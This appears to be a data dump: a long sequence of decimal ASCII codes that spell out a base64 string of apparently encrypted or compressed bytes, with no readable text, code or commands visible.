115 104 51 116 119 68 82 67 113 118 50 66 101 99 86 74 71 70 48 89 48 48 81 110 117 72 79 110 55 105 69 75 54 84 98 103 72 105 85 84 101 85 69 47 102 85 83 54 110 107 80 122 85 47 78 102 51 109 116 113 116 118 86 85 117 105 76 116 104 84 100 70 74 76 50 67 72 110 75 49 110 48 98 87 65 102 43 79 122 56 43 76 69 120 104 65 117 78 116 102 87 43 56 103 86 113 85 70 108 76 84 102 110 113 88 105 102 66 122 52 87 99 98 47 56 68 81 106 80 112 68 83 115 56 48 90 103 54 115 47 107 47 86 90 75 89 118 80 90 79 122 53 119 118 119 72 73 119 109 84 102 98 122 50 56 84 78 77 88 99 121 111 90 75 54 113 101 107 73 113 48 67 116 54 43 98 112 53 71 98 114 100 72 53 43 73 119 52 90 70 84 79 121 70 83 54 56 117 102 71 84 82 53 75 51 74 121 89 78 81 100 90 43 74 82 109 56 53 83 111 51 49 107 103 84 121 100 102 75 73 69 67 56 98 106 66 83 85 109 87 102 79 109 68 78 116 78 88 80 65 73 71 85 67 67 70 82 108 65 52 67 121 119 105 106 49 54 98 100 47 47 116 97 100 89 117 54 71 86 101 115 49 90 88 56 105 66 51 78 85 110 76 47 86 103 117 82 80 109 108 119 120 109 121 52 77 115 98 79 43 104 114 110 103 54 117 76 66 73 107 54 103 115 48 102 47 116 100 77 70 97 65 115 110 75 82 55 106 107 67 116 116 84 90 99 103 110 113 65 65 105 103 105 65 114 109 51 52 83 110 88 53 110 65 114 48 107 86 69 105 90 105 75 67 104 81 115 72 99 84 73 89 83 106 73 50 73 84 111 98 79 48 43 66 101 57 121 67 110 70 111 122 53 120 55 90 101 75 102 118 80 67 111 56 103 55 88 75 121 80 98 43 53 52 78 81 78 113 88 117 98 103 74 88 86 100 111 67 85 100 77 97 86 109 90 69 69 115 72 97 116 55 88 112 111 107 107 108 121 48 117 109 114 104 118 122 110 120 76 97 75 76 54 122 75 75 77 114 120 83 78 115 85 86 98 111 52 115 110 75 65 104 71 98 77 47 83 56 80 89 47 98 106 79 87 99 78 65 110 81 77 116 51 50 98 108 114 99 47 102 43 80 105 72 103 109 54 52 52 109 90 105 83 71 48 78 110 43 89 117 80 109 73 73 87 50 80 90 79 122 52 101 88 66 121 121 50 116 76 53 54 111 74 89 107 51 76 114 78 56 56 107 104 109 84 48 119 122 104 53 55 49 86 88 100 82 121 113 121 71 50 89 122 107 77 79 79 78 114 86 52 77 121 112 113 53 114 72 100 50 90 90 84 105 65 90 69 87 105 115 115 71 113 50 52 103 56 116 108 72 76 49 109 71 115 70 84 71 116 106 114 84 69 119 108 74 119 113 84 50 99 69 79 105 100 81 88 74 81 120 78 108 55 100 104 75 97 105 121 50 53 118 120 57 100 72 102 88 69 84 74 111 89 57 80 119 65 117 43 51 102 47 80 55 110 52 87 81 117 84 50 100 80 75 118 68 50 80 66 115 71 55 57 48 88 85 116 90 79 84 55 104 102 90 71 72 108 66 121 54 103 52 101 56 81 67 102 72 78 98 80 83 98 115 88 121 113 88 80 112 56 98 97 48 98 70 107 109 50 115 113 43 54 84 102 53 97 104 72 122 85 52 104 55 47 71 90 69 117 71 43 76 97 84 51 89 110 122 78 109 122 56 115 68 122 47 99 43 85 55 87 50 90 50 85 82 69 69 118 81 53 77 74 70 114 67 120 110 81 74 112 107 72 78 73 47 48 102 83 111 105 85 69 88 104 48 103 102 122 88 72 55 65 118 53 99 107 118 120 85 82 102 47 118 119 73 121 66 84 76 117 122 77 97 113 112 47 66 47 88 100 105 55 72 51 49 114 83 87 43 100 54 85 70 107 57 54 103 68 67 83 55 105 84 69 85 54 102 80 68 106 112 50 97 73 106 100 80 68 49 56 80 116 56 83 56 72 48 43 77 110 48 105 79 76 119 122 77 120 80 100 49 68 88 77 49 109 119 48 51 100 48 103 118 52 82 73 86 80 54 69 48 100 79 54 120 99 79 109 83 87 110 78 87 57 101 122 56 69 57 77 106 90 82 98 78 117 88 113 101 104 50 100 75 49 88 71 66 113 98 71 118 116 102 110 53 122 56 113 56 103 111 98 79 72 75 54 114 72 72 72 71 43 50 101 52 90 56 78 48 87 99 43 84 77 114 105 52 74 68 117 73 101 66 54 47 115 43 86 51 109 122 112 120 69 72 105 100 101 51 52 103 102 97 119 113 57 48 83 86 116 119 87 80 47 110 121 107 53 116 89 104 116 89 117 49 72 113 77 108 75 97 77 107 105 112 100 84 84 86 73 79 50 50 75 87 81 113 120 75 49 104 118 106 76 100 51 110 116 54 72 81 55 98 102 122 75 85 121 115 69 71 99 77 43 48 116 103 74 117 87 76 54 114 101 122 99 98 88 105 67 84 97 81 103 116 120 88 85 106 89 116 85 77 110 52 99 77 79 109 114 105 52 77 98 101 56 43 68 104 74 82 99 79 122 57 114 43 57 115 77 110 78 48 99 104 71 82 106 117 53 109 43 88 113 68 74 55 56 108 101 113 110 104 75 97 67 121 106 83 117 108 102 88 75 57 115 113 80 105 102 111 69 65 82 72 107 105 111 115 57 68 68 70 97 105 107 73 83 52 71 65 72 100 104 85 119 110 52 71 54 56 102 82 108 115 118 109 47 117 75 105 110 81 83 68 50 53 102 85 56 71 43 98 49 65 71 76 52 67 43 84 113 53 115 97 117 98 112 65 101 83 54 85 75 101 87 79 111 82 103 66 73 109 97 97 122 79 55 117 98 87 117 105 49 114 71 50 89 89 71 117 83 81 72 117 68 67 86 110 74 83 54 114 119 47 104 87 90 105 109 72 97 65 49 57 110 109 103 75 109 84 109 71 56 78 85 90 48 109 98 77 55 50 81 43 70 118 48 90 53 72 110 78 120 101 116 120 75 51 50 118 113 82 52 109 47 52 120 68 120 103 88 116 117 76 115 84 105 87 82 119 48 103 108 113 119 75 50 78 110 52 47 103 67 65 67 108 77 119 103 117 54 55 70 49 101 76 48 104 100 100 51 81 54 120 122 78 101 67 105 66 52 81 81 80 72 114 85 121 97 49 103 51 88 74 117 117 57 110 51 103 80 110 105 84 117 97 112 55 106 122 67 51 74 77 50 70 107 87 49 80 76 57 56 86 75 111 75 73 57 104 109 55 53 116 72 69 106 116 43 57 109 106 111 90 49 104 85 119 80 101 85 114 100 65 122 90 99 101 47 51 87 49 114 83 69 107 74 54 98 51 106 51 82 117 43 47 87 105 55 122 75 113 47 98 119 72 70 116 109 75 107 84 89 114 114 102 51 53 69 70 115 89 82 85 65 49 105 47 87 100 50 121 68 101 100 114 105 97 55 72 73 68 77 98 49 115 111 48 103 47 111 99 101 86 57 56 111 53 76 114 112 48 80 116 122 56 90 68 119 118 83 73 121 84 47 109 114 43 99 117 57 47 122 50 47 114 112 104 90 111 75 107 118 48 52 70 107 82 48 47 52 53 66 43 80 120 114 118 100 73 76 66 54 110 86 75 49 112 83 75 50 114 98 85 57 99 114 88 70 102 48 81 111 109 75 51 48 115 51 77 47 84 72 89 119 104 88 57 97 54 50 51 104 49 89 89 90 122 100 47 47 54 78 68 88 69 122 67 105 100 115 74 57 86 105 49 74 73 72 99 57 80 119 106 85 51 90 100 50 69 47 97 106 110 89 112 90 47 87 85 49 85 101 121 118 57 72 71 48 97 109 57 119 111 48 87 85 78 98 88 83 90 119 83 81 75 85 55 69 73 119 118 122 118 88 104 106 80 69 75 116 51 78 111 74 87 87 55 43 80 106 108 79 105 67 56 85 70 105 55 52 85 111 108 55 48 50 53 115 85 110 121 121 52 57 102 100 48 79 71 105 120 105 122 116 49 43 79 109 84 88 112 55 56 52 84 105 54 51 101 110 103 82 65 119 67 107 52 114 76 121 85 108 73 86 115 105 55 66 83 89 71 106 71 119 84 50 105 86 74 79 87 76 76 85 120 104 54 98 87 71 109 78 116 83 68 104 113 47 89 48 68 76 111 70 83 88 52 86 112 52 107 53 76 90 102 111 82 76 56 110 86 108 119 80 84 57 86 52 90 71 108 47 85 78 122 81 81 83 50 100 120 101 120 76 52 122 108 84 82 100 102 87 115 75 43 121 107 113 90 50 57 52 87 65 116 81 89 51 47 110 83 121 68 51 114 81 117 48 43 100 84 98 101 105 100 108 79 100 116 80 84 97 105 78 70 50 68 113 69 54 97 57 102 79 84 71 122 107 118 117 78 69 109 56 121 112 55 65 77 67 70 48 74 113 121 118 117 77 85 74 98 81 103 77 52 48 48 100 112 80 53 102 78 122 79 88 104 117 88 71 112 97 51 110 89 75 105 81 71 79 115 57 117 57 50 121 116 72 55 68 78 53 67 109 87 77 55 109 115 65 110 55 50 53 90 48 76 109 103 108 69 113 67 101 109 68 78 76 75 103 108 75 70 110 113 104 66 107 56 72 76 68 55 103 77 85 89 71 88 88 66 101 120 108 76 116 43 73 71 72 115 120 78 113 77 49 113 110 116 101 70 118 70 117 53 87 97 65 81 90 57 109 107 104 75 122 98 50 84 113 57 53 122 111 122 69 82 70 85 122 100 56 87 82 99 50 118 116 89 87 98 105 119 79 99 107 83 79 57 75 72 102 119 118 47 121 56 57 43 107 74 55 51 57 89 52 106 117 82 103 83 122 104 67 118 102 99 116 112 57 77 49 76 81 103 122 111 47 112 54 83 71 99 51 72 79 67 114 122 81 54 88 67 101 97 53 110 57 84 79 89 84 110 122 103 47 78 120 109 116 78 65 115 121 56 110 110 57 79 90 102 107 48 79 101 112 115 53 79 52 107 102 109 78 122 108 107 90 98 50 108 122 53 115 57 79 121 56 56 112 51 76 121 116 111 65 104 53 99 84 82 82 90 97 43 116 89 88 79 89 102 90 70 119 84 55 84 80 119 51 55 101 82 108 66 86 118 80 88 115 111 113 75 51 74 48 67 70 109 84 77 109 71 79 79 89 71 100 51 98 53 71 72 75 88 112 89 117 111 110 122 53 106 117 110 70 115 118 53 109 116 98 103 68 82 88 56 80 88 81 51 78 57 78 74 74 103 56 109 52 119 79 52 101 72 104 78 100 103 97 66 105 114 76 109 110 74 103 80 71 65 101 87 111 79 77 88 107 43 49 54 82 101 104 111 115 55 87 74 105 66 114 67 68 82 110 71 68 72 55 87 113 70 84 80 105 99 55 82 107 89 109 83 121 43 111 55 84 69 72 75 122 110 122 121 66 56 52 84 81 57 78 87 90 75 106 72 107 99 99 67 66 83 104 47 65 111 86 119 78 83 82 113 105 56 55 71 120 116 82 121 97 52 98 74 68 90 109 56 88 121 83 104 115 104 113 69 110 56 80 80 103 98 43 105 104 98 83 73 70 69 99 107 55 88 48 84 71 51 71 69 119 118 116 110 81 57 102 55 111 114 106 71 120 108 108 47 81 57 120 86 80 77 86 80 83 53 65 121 118 119 54 87 102 79 50 56 73 101 112 110 107 79 102 88 112 50 100 88 99 122 108 120 67 56 88 69 83 122 86 105 79 88 74 55 82 108 84 78 116 106 51 50 51 119 49 97 102 49 47 47 122 90 117 117 56 82 103 65 51 71 70 76 49 54 57 49 104 79 87 87 105 101 71 57 76 84 72 89 86 83 98 56 105 54 76 48 108 66 102 122 43 67 101 102 80 77 121 107 112 98 82 52 48 116 105 48 78 66 90 120 82 55 87 69 86 115 111 71 114 105 43 71 121 53 51 55 108 118 87 55 102 85 100 111 51 88 50 106 112 79 76 51 47 117 121 66 105 53 71 73 49 111 48 72 67 104 70 79 88 56 110 97 54 52 118 111 51 71 70 110 69 85 85 70 53 85 105 107 86 69 112 86 121 105 104 97 50 53 103 50 47 109 68 90 109 69 109 86 99 98 116 117 89 105 56 116 122 56 47 105 74 115 82 111 54 71 49 74 118 48 49 82 97 71 51 104 98 82 54 72 57 43 50 99 52 87 74 118 98 103 51 74 82 57 112 76 51 117 72 51 50 74 69 47 55 79 72 70 57 107 101 69 49 77 85 98 82 116 43 111 110 70 111 103 102 102 90 85 84 54 43 55 47 43 118 111 55 68 77 71 55 100 115 100 87 108 81 84 115 77 74 117 103 90 85 116 98 90 100 51 78 88 80 116 121 57 57 68 77 117 97 76 73 109 99 108 76 108 70 100 104 57 112 104 98 76 112 98 87 88 56 85 50 113 70 120 43 86 52 119 115 72 49 99 49 52 109 81 100 108 65 117 52 55 100 121 102 110 72 90 118 69 103 79 116 120 103 51 105 81 77 111 76 112 81 85 84 85 80 52 86 87 47 115 108 51 87 107 69 47 117 102 105 78 108 118 111 120 83 79 108 53 117 86 52 43 55 48 79 78 56 74 71 116 106 66 76 89 98 101 88 114 99 72 74 57 54 99 107 122 122 98 49 120 109 113 73 57 66 55 71 114 104 80 114 98 114 109 77 72 97 105 52 122 101 105 120 84 100 51 82 116 76 55 55 86 101 70 116 121 71 57 83 50 53 113 101 120 54 105 107 49 111 74 52 67 118 87 85 98 56 109 90 104 73 51 81 82 43 47 97 69 49 50 115 101 79 120 51 117 112 110 78 122 122 87 108 104 89 67 116 55 43 78 115 52 99 112 102 120 43 90 112 89 114 118 89 84 70 75 118 73 100 78 72 82 73 97 86 99 81 81 74 120 99 47 97 111 71 85 55 65 103 85 105 116 56 120 73 80 51 121 67 51 112 88 67 84 52 72 79 105 83 43 81 105 55 97 110 75 82 122 70 43 70 103 69 86 84 52 50 74 43 71 115 114 71 87 70 122 50 51 66 118 43 121 47 98 87 52 86 66 116 71 119 120 106 43 108 119 119 51 49 109 47 102 51 120 120 111 85 98 121 79 65 43 88 99 86 116 75 120 101 108 73 113 119 48 79 97 118 117 87 117 57 75 83 66 81 55 89 101 75 111 73 75 72 48 69 75 106 68 75 110 89 105 73 111 101 100 122 79 70 98 70 51 112 71 97 54 114 106 101 113 69 76 112 110 70 103 66 98 69 82 53 114 47 113 68 122 77 114 105 101 70 72 110 119 110 57 87 119 106 116 68 72 48 114 80 107 76 65 43 67 75 65 111 110 102 98 120 89 49 67 70 48 88 90 72 101 87 75 106 75 104 112 99 111 49 122 81 86 107 81 74 120 68 48 118 77 108 109 122 111 82 56 89 101 100 77 85 121 107 49 118 98 108 50 49 110 98 99 43 51 113 69 89 86 79 55 112 122 49 50 98 70 65 53 88 120 79 55 66 52 97 53 48 83 47 102 89 43 77 115 43 115 118 88 82 77 49 87 65 88 76 104 71 74 86 115 111 51 81 71 116 69 57 69 109 80 48 49 57 43 47 47 57 120 118 83 75 119 114 89 83 103 56 99 83 116 115 83 43 49 107 48 77 68 107 109 54 56 90 83 83 83 118 77 67 82 66 120 68 90 77 111 120 80 111 66 79 54 43 57 75 113 57 66 122 47 80 54 88 66 108 122 51 76 112 65 76 76 106 122 66 56 74 51 120 99 49 116 43 101 103 74 79 102 80 122 43 80 78 71 114 116 71 113 69 101 50 99 104 88 90 114 50 120 54 72 55 103 114 72 85 57 76 122 48 122 103 117 72 110 117 77 88 81 99 88 115 53 81 48 111 50 74 67 47 47 73 115 74 67 120 104 83 107 67 82 43 43 88 89 48 117 68 79 71 122 114 112 72 47 114 116 73 113 121 116 113 52 89 112 68 86 78 106 117 97 53 49 87 111 104 79 47 109 51 115 53 70 74 68 86 116 86 47 102 102 113 57 56 114 83 105 120 53 89 72 116 77 104 84 78 86 75 67 54 114 87 115 105 99 112 103 75 104 83 101 103 50 66 107 108 56 111 81 67 122 53 53 119 87 80 117 66 107 114 88 106 83 90 80 68 47 111 80 110 120 57 90 53 43 48 102 55 51 54 56 79 72 74 47 55 100 112 76 84 70 49 54 52 103 87 49 106 84 105 70 73 99 121 104 73 99 72 71 69 71 99 82 111 84 50 49 84 55 43 43 86 70 100 100 98 65 118 107 87 84 54 107 87 89 68 114 48 108 115 105 52 81 107 43 102 111 120 112 115 71 107 47 65 110 113 106 66 52 57 54 47 51 84 77 68 115 80 102 104 116 106 116 68 99 115 117 81 51 50 71 67 85 51 108 110 55 109 53 107 71 90 43 47 111 78 51 50 47 111 122 82 118 85 67 107 82 114 117 54 111 73 113 90 86 110 55 76 72 53 71 115 65 102 68 108 51 82 108 52 79 50 84 78 51 48 68 122 55 48 112 73 115 121 81 108 73 90 85 66 84 75 84 116 120 81 51 103 89 109 66 67 101 76 104 112 89 102 73 43 76 116 122 112 80 114 113 122 56 122 72 117 101 52 98 83 52 115 53 85 76 120 50 55 99 54 121 118 76 43 52 105 74 66 87 121 87 112 89 80 116 116 108 122 80 55 65 118 83 56 70 51 97 89 105 84 101 81 78 120 69 81 103 51 53 55 55 101 83 54 117 117 47 112 121 83 72 53 69 87 86 47 90 118 108 116 85 118 86 47 75 51 112 50 47 79 87 117 73 54 52 74 90 66 107 86 67 86 47 89 120 77 120 85 43 79 98 116 80 56 107 106 115 103 77 113 113 117 107 104 90 106 85 119 52 99 117 108 120 102 101 98 106 111 120 84 57 77 65 120 97 108 84 106 98 77 110 107 122 89 43 112 108 98 114 70 57 73 90 87 108 68 48 84 101 66 50 56 100 101 56 82 101 69 70 74 84 114 83 118 104 77 48 48 106 77 112 71 114 67 83 70 66 73 47 89 57 116 107 66 98 67 74 76 116 97 104 115 75 117 54 79 120 103 110 82 53 106 47 89 55 50 121 111 114 57 89 119 98 49 90 65 108 53 113 85 87 86 77 82 79 57 72 69 118 99 66 70 85 116 106 65 122 54 77 72 74 73 102 77 86 57 70 52 79 120 86 117 74 69 118 69 49 102 112 76 87 71 111 89 80 54 49 112 77 73 83 86 49 98 75 113 114 77 98 55 108 120 54 80 67 81 105 107 78 52 89 117 78 86 69 104 72 76 113 75 99 80 105 43 102 105 54 52 76 49 112 73 97 68 55 52 76 122 104 82 100 114 71 106 101 110 47 83 101 85 103 115 90 79 82 54 70 66 88 110 56 117 73 70 104 106 110 82 66 87 55 109 84 69 66 66 86 115 84 74 117 85 89 47 98 78 55 78 112 43 76 68 69 54 98 55 74 115 48 109 73 70 49 50 84 116 54 90 113 103 57 78 85 109 90 49 55 117 85 79 89 82 88 71 78 85 84 78 104 43 117 71 68 100 43 98 75 87 113 54 68 78 43 85 72 69 77 86 98 83 121 57 77 102 70 47 56 99 71 108 85 82 117 89 101 110 52 71 88 99 101 89 54 101 43 80 78 50 74 115 109 106 78 85 86 65 48 121 98 68 66 77 76 52 43 56 102 47 118 73 90 79 68 55 57 55 78 100 53 122 54 109 119 109 73 110 56 70 119 112 121 76 119 89 122 78 108 78 115 102 82 103 120 79 53 43 103 107 76 99 72 90 110 79 73 113 88 68 70 110 68 111 100 111 97 78 115 105 122 66 88 84 105 116 49 109 117 55 114 90 54 118 55 69 86 97 99 113 50 75 105 113 86 120 90 121 115 69 47 83 108 112 74 50 73 52 48 68 101 68 50 68 104 43 78 73 75 51 111 121 72 50 47 65 56 74 87 89 103 117 50 67 120 71 53 103 73 75 90 56 70 99 74 90 51 79 112 87 74 117 100 80 75 103 114 84 90 120 52 104 115 84 98 104 71 84 102 104 107 47 108 53 87 75 72 76 72 117 53 74 88 110 74 47 50 84 79 53 120 47 66 77 100 56 54 50 108 50 74 98 114 78 121 113 89 122 109 73 73 122 100 69 122 73 57 53 43 48 98 112 68 117 72 74 110 105 55 47 66 66 117 83 55 55 90 119 85 121 90 50 47 114 54 116 90 117 108 49 105 53 54 67 57 51 50 112 118 97 121 43 57 75 54 97 48 66 48 68 73 80 76 102 112 109 104 48 70 121 102 105 97 65 77 87 67 111 84 105 100 104 115 98 51 120 86 104 114 101 122 88 76 89 107 98 102 49 121 57 101 50 109 103 105 114 70 86 104 65 84 84 110 107 120 114 47 78 69 51 89 57 120 76 84 80 66 85 110 65 74 51 81 74 88 69 48 104 55 119 103 81 107 51 104 105 118 71 102 69 103 106 71 119 84 120 119 105 90 52 81 70 56 47 50 88 116 52 85 106 69 86 110 88 115 81 78 90 108 87 100 121 54 86 116 69 98 108 121 120 83 49 90 87 53 106 111 78 121 47 88 115 107 99 84 47 101 73 118 89 55 84 88 101 97 117 52 87 67 85 106 104 99 112 102 112 102 121 83 120 71 52 68 78 51 103 84 97 121 88 49 77 69 101 77 55 70 110 88 70 55 55 50 85 117 86 119 85 97 49 100 57 99 117 79 68 110 88 106 111 54 52 51 75 68 111 76 121 68 80 111 72 87 70 86 99 87 81 122 82 77 73 68 71 122 75 110 65 113 113 119 103 118 101 76 50 98 97 110 117 122 88 81 112 76 69 75 73 71 108 121 101 109 118 56 121 104 115 70 87 108 118 79 47 119 108 89 74 82 52 55 121 114 118 109 48 86 119 52 107 74 73 55 114 103 65 101 75 75 114 53 100 112 117 122 105 87 102 80 112 111 71 72 114 122 106 43 71 69 74 115 48 101 97 110 53 105 50 108 73 54 75 47 112 82 74 88 86 101 47 118 119 50 79 105 120 86 113 83 79 73 50 102 111 106 109 54 53 98 90 82 117 114 117 120 108 84 100 55 75 51 49 97 102 82 100 82 106 108 88 107 116 76 108 98 108 97 75 85 70 80 70 104 98 88 106 76 50 54 98 76 51 89 83 106 122 112 117 67 88 83 115 48 76 100 70 43 82 113 48 79 77 56 73 113 76 104 98 66 77 70 115 107 84 114 113 55 89 110 82 86 110 75 84 43 48 89 86 72 100 100 74 75 122 47 49 99 75 86 48 106 56 48 120 106 55 56 65 98 85 90 106 54 49 118 74 113 114 105 117 86 103 108 102 105 111 66 66 74 101 87 70 79 75 53 87 107 68 111 79 69 109 100 120 84 121 43 80 56 102 54 80 122 120 88 87 88 86 98 72 48 85 111 98 83 120 113 110 81 51 109 83 104 50 89 116 51 67 55 56 69 56 102 113 56 68 49 49 101 97 54 81 66 53 50 105 83 47 69 86 110 118 68 122 100 90 50 77 79 68 98 75 78 57 55 66 97 84 70 74 112 54 77 53 117 52 109 71 55 80 68 74 57 122 109 83 108 101 101 76 56 111 121 43 89 116 57 86 75 80 65 69 112 121 110 116 87 87 54 65 109 65 48 79 114 88 75 65 103 71 115 121 54 115 102 107 118 66 114 113 66 108 53 68 113 87 109 102 118 106 113 67 72 66 55 112 50 77 113 57 99 97 70 76 85 77 109 80 54 84 73 48 54 121 51 107 85 88 67 117 65 81 85 65 81 49 43 120 114 56 114 78 109 97 43 87 112 74 122 48 85 90 87 105 48 52 71 120 72 72 115 121 108 83 69 81 65 106 89 52 104 105 53 104 50 86 108 69 81 51 90 71 88 106 77 111 80 117 71 50 99 110 67 119 65 78 89 109 112 109 66 102 75 52 69 84 86 113 88 115 116 89 122 90 49 81 53 55 106 69 97 68 122 100 84 99 68 77 68 78 118 47 52 67 68 105 65 49 70 84 71 65 102 90 116 98 103 65 110 53 111 68 85 69 85 57 89 119 100 107 78 70 111 117 66 97 84 78 82 88 51 67 65 112 43 55 50 104 87 77 109 53 110 122 83 81 110 52 111 76 105 97 69 119 98 81 120 88 85 120 106 106 112 70 82 82 107 77 48 73 67 66 115 80 117 112 71 98 43 107 73 82 100 68 113 83 69 97 104 108 108 103 75 83 108 106 67 119 104 68 109 112 51 116 103 122 78 52 76 83 108 81 99 102 108 81 72 98 120 118 84 108 86 54 65 56 84 100 84 76 54 81 77 47 54 78 121 47 52 65 106 103 101 79 53 47 101 73 53 117 49 78 86 120 69 98 77 116 82 117 112 47 110 69 103 65 75 72 47 105 113 51 54 111 49 66 53 53 90 116 102 84 70 84 76 88 57 111 98 79 69 69 74 84 49 98 53 100 51 100 97 73 89 66 50 75 51 98 113 100 100 55 87 55 101 43 114 72 84 49 78 117 56 78 112 48 75 54 115 69 54 84 101 85 109 118 65 88 99 110 50 43 86 115 122 69 102 49 101 70 79 57 89 54 83 97 87 69 111 86 77 108 57 109 114 119 111 53 109 69 97 121 48 43 84 50 117 97 70 80 98 116 113 105 114 102 112 53 111 56 88 72 65 81 66 88 70 57 66 66 122 114 74 116 102 87 87 55 109 119 112 117 48 82 120 69 50 53 76 102 52 76 101 70 77 71 88 76 109 90 47 50 52 118 54 74 89 87 56 113 80 108 119 107 79 103 100 119 112 99 74 98 122 49 81 73 47 115 116 117 67 110 43 52 80 90 66 106 116 111 122 50 99 121 51 79 53 108 120 90 67 77 73 52 100 72 102 112 98 102 57 48 65 88 107 111 116 48 72 73 105 111 47 78 78 49 103 56 84 49 53 106 116 72 70 75 79 53 70 98 109 90 101 72 89 101 86 81 107 98 116 48 100 88 120 119 100 87 57 47 117 99 120 50 69 90 105 71 117 103 56 104 51 67 57 50 83 80 109 120 89 75 90 80 102 55 121 98 100 75 120 115 89 54 119 101 47 101 116 47 84 116 108 78 76 54 122 78 68 107 53 50 100 66 111 100 120 68 108 55 52 54 50 79 48 105 54 111 108 73 122 79 109 88 115 43 72 55 101 104 47 57 83 52 121 101 76 113 66 86 110 118 112 99 65 113 102 84 88 54 116 53 84 113 110 82 116 122 57 100 86 67 122 119 77 98 105 70 120 82 67 80 49 51 120 121 66 66 109 101 82 69 116 121 122 110 67 56 97 87 68 83 48 78 80 81 111 43 117 105 105 100 55 81 102 110 99 101 49 70 117 68 108 55 50 109 65 116 113 90 70 100 113 104 99 75 106 97 53 87 102 76 55 79 78 49 71 78 120 103 77 105 104 75 68 72 75 99 78 83 71 73 118 68 107 73 81 49 112 54 84 75 55 74 78 120 54 72 89 118 100 50 49 67 66 89 69 83 120 68 57 117 55 82 98 107 110 54 87 112 99 102 47 117 57 57 56 98 120 55 87 72 82 43 53 50 99 98 54 51 108 81 119 98 81 84 112 115 108 83 81 108 73 71 88 80 89 48 78 97 80 43 52 111 113 47 73 74 48 74 77 55 68 116 70 54 99 86 82 81 67 72 74 97 78 66 83 87 78 77 111 102 56 43 70 115 47 47 82 107 52 108 82 74 97 121 78 112 49 72 51 112 88 87 99 112 79 110 50 101 73 107 99 121 70 83 87 85 99 79 107 117 70 110 90 104 72 122 119 48 75 84 43 75 74 85 118 113 65 84 75 76 112 109 122 71 47 98 68 49 69 112 121 82 110 115 85 66 89 52 105 76 54 90 117 80 107 120 50 50 55 54 117 81 90 117 87 83 110 97 55 51 79 105 52 52 70 47 47 114 49 78 56 70 81 110 99 118 57 121 83 47 105 98 101 66 98 104 116 57 120 116 100 80 88 51 101 70 121 77 55 68 84 57 73 118 66 70 109 100 85 77 71 87 88 47 52 106 101 115 88 120 79 117 65 48 114 116 97 100 121 72 84 53 85 74 102 66 121 48 81 88 81 85 115 68 84 54 73 51 43 88 84 49 87 101 112 84 118 97 115 109 112 108 102 115 77 56 102 106 90 119 84 111 49 51 57 109 101 78 99 113 54 103 72 65 49 50 102 87 100 104 100 69 83 114 108 67 51 79 105 71 115 76 70 98 90 84 79 113 68 89 43 97 108 54 74 112 68 121 78 90 67 120 90 101 109 57 76 80 50 55 66 102 119 85 73 108 77 88 112 98 72 85 122 111 97 86 47 85 43 53 51 100 77 79 112 119 100 51 99 98 47 80 72 107 97 72 71 66 69 104 117 97 50 122 116 118 75 114 120 98 89 89 67 74 101 54 69 88 110 70 105 56 98 80 71 80 113 71 112 118 116 51 97 90 113 84 68 116 53 98 76 55 109 98 82 115 57 108 112 117 113 67 113 119 70 50 57 79 89 52 81 47 80 107 66 112 50 69 88 49 107 47 107 71 105 111 75 70 117 116 104 104 48 118 101 80 73 121 119 54 71 119 119 76 85 52 47 99 52 120 72 83 117 107 72 82 107 71 72 53 52 53 104 51 55 87 70 105 103 101 76 77 119 87 56 55 72 117 84 47 49 99 82 78 107 99 122 97 90 88 111 55 108 72 86 112 113 112 55 100 99 69 57 55 108 116 71 110 47 68 78 49 51 78 48 117 73 86 107 109 82 75 113 52 73 108 70 43 51 56 78 54 108 85 101 121 115 71 87 88 81 47 67 113 80 47 51 79 102 107 85 97 55 80 73 97 115 122 50 79 49 56 85 122 84 117 85 119 117 115 66 90 43 78 106 98 122 55 120 55 97 74 68 77 71 49 112 52 89 97 71 53 107 105 43 83 118 113 68 85 122 55 65 121 43 74 49 86 57 81 81 49 75 77 117 108 78 120 84 87 69 115 74 51 89 114 79 47 99 103 53 88 49 97 89 102 102 101 115 118 114 86 65 68 75 55 122 57 80 71 57 49 54 104 121 68 85 119 68 82 107 82 97 80 76 106 48 109 47 51 109 56 78 54 51 118 121 109 53 79 85 69 106 90 122 71 122 48 110 116 47 89 106 51 81 117 87 53 114 111 105 100 101 55 104 48 55 81 77 72 51 89 66 71 85 81 78 74 114 117 71 76 103 70 107 80 108 56 88 108 83 73 81 74 122 84 54 97 67 73 102 120 111 106 113 119 97 120 107 43 113 101 119 98 82 77 50 89 115 105 50 77 113 54 87 108 98 98 108 48 89 48 73 65 52 76 86 48 67 56 110 104 90 121 68 71 119 49 51 43 49 77 84 120 108 118 55 55 78 98 76 54 52 103 97 65 55 69 103 79 65 68 89 120 116 65 87 54 53 48 109 89 85 101 121 73 66 78 110 81 87 67 66 55 57 106 77 117 121 85 85 65 70 72 82 68 87 108 107 70 84 109 53 121 119 57 68 119 88 97 106 55 120 119 84 57 111 98 68 84 114 99 53 103 89 85 65 43 80 49 73 83 118 113 57 75 79 70 53 67 82 51 107 54 83 71 74 81 67 107 107 68 75 109 110 97 118 57 75 53 50 84 109 56 79 74 119 48 113 88 110 111 83 48 68 101 87 82 121 117 53 109 72 113 84 121 71 56 98 109 107 50 117 118 76 108 119 55 73 110 49 65 105 73 108 84 113 78 74 89 67 86 120 80 97 118 101 80 104 53 116 69 48 75 75 110 115 97 79 66 104 75 119 54 104 80 67 81 104 109 89 105 49 116 52 43 74 76 82 115 51 122 47 56 86 43 47 98 104 66 57 85 66 43 57 105 111 101 109 89 108 48 117 115 53 52 111 80 50 112 86 65 104 90 111 82 70 105 89 78 66 49 104 69 90 85 120 79 101 98 56 43 103 55 43 107 79 72 66 77 80 51 84 49 50 115 69 120 100 90 70 121 75 121 115 116 68 106 85 73 101 73 66 85 66 80 71 53 69 112 103 75 75 68 121 70 88 114 67 106 83 43 54 82 105 104 99 99 54 78 74 111 75 56 55 71 99 109 98 71 106 78 105 80 120 97 111 103 90 48 67 53 65 97 115 116 71 106 72 51 52 87 118 70 118 107 102 52 66 72 65 121 43 65 103 112 51 73 84 78 90 56 87 104 89 74 112 81 102 51 67 116 113 50 118 111 72 114 109 72 111 50 99 77 47 122 116 72 72 56 67 65 104 110 74 65 73 113 71 65 98 54 49 56 57 82 82 115 99 83 48 56 82 110 84 67 108 68 81 57 118 79 48 73 57 80 109 47 121 69 55 43 117 103 70 104 74 72 52 68 79 70 66 114 97 86 52 100 81 84 104 81 67 51 111 55 81 67 115 54 99 65 101 70 112 84 108 66 51 55 103 106 43 43 119 83 101 76 102 55 76 102 88 54 115 108 104 108 80 101 70 53 114 87 117 80 109 57 78 119 68 81 53 77 120 76 100 78 99 80 71 86 84 105 111 73 78 75 66 74 53 